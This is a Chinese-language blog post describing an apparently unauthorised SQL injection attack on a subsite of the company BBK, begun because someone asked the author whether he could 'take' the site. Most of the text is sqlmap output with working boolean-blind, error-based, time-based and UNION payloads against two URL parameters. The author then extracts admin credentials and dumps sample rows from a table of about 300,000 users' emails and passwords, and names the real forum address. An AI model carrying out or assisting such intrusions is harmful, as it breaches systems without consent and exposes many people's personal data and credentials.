版权归作者所有,转载请注明出处
对步步高某分站的一次小小检测
0x01 起因,某童鞋问我能不能拿下这个站 我看了下,有注入,但存在白名单过滤
漏洞页面:https://xxx.cn/xxx.php?Class_ID=1&Pro_ID=69
sqlmap测试
---
Parameter: Class_ID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: Class_ID=-3922 OR 2369=2369#&Pro_ID=69
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (BIGINT UNSIGNED)
Payload: Class_ID=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717178
6a71,(SELECT (ELT(7537=7537,1))),0x71717a7671,0x78))s), 8446744073709551610, 844
6744073709551610)))&Pro_ID=69
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: Class_ID=1 AND SLEEP(5)&Pro_ID=69
Type: UNION query
Title: MySQL UNION query (NULL) - 27 columns
Payload: Class_ID=1 UNION ALL SELECT CONCAT(0x7171786a71,0x454d5245645243744
5546c42546d51695542414d775757566478686e4168734c6d70746249706a6a,0x71717a7671),NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Pro_ID=69
Parameter: Pro_ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Class_ID=1&Pro_ID=69 AND 3511=3511
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (BIGINT UNSIGNED)
Payload: Class_ID=1&Pro_ID=69 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCA
T(0x7171786a71,(SELECT (ELT(7590=7590,1))),0x71717a7671,0x78))s), 84467440737095
51610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: Class_ID=1&Pro_ID=69 AND SLEEP(5)
---
可以看到,存在盲注,延迟注入,联合查询等,这里我们选择盲注。直接爆数据库用户数据库名吧
0x02
current user: 'bbktel_www@localhost'
current database: 'bbk_tel'
0x03 接下来查询表名列名然后直接查询账号密码即可。
得到后台账号密码。
md5解密出来找不到后台这是最气的.....
0x04 我们看看数据库里还有啥东西(ps:小朋友不要跟我学噢)
30w用户信息--.--列名为 uid,email,username,password
使用--start --stop命令跑出前50条测试下
论坛页面为 https://www.bbktel.com.cn/bbs/
